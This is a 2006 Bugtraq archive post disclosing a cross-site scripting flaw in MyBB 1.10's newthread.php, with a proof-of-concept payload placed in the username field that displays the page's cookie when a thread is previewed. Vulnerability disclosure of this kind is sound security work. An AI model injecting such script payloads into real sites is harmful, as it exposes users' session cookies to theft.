Bugtraq mailing list archives
MyBB 1.10 'newthread.php' < CrossSiteScripting >
From: o.y.6 () hotmail com
Date: 9 Apr 2006 21:14:08 -0000
MyBB 1.10 'newthread.php' < CrossSiteScripting >
[ Devil-00 | D3vil-0x1 ]
[*] Conditions [*]
1- your unregisterd user
2- you have permissions to do newthread
[---------------]
do newthread with this username :-
<script>alert(document.cookie);</script>D3vil-0x1
Then Preview it ;)
[---------------]
Current thread:
- MyBB 1.10 'newthread.php' < CrossSiteScripting > o . y . 6 (Apr 10)
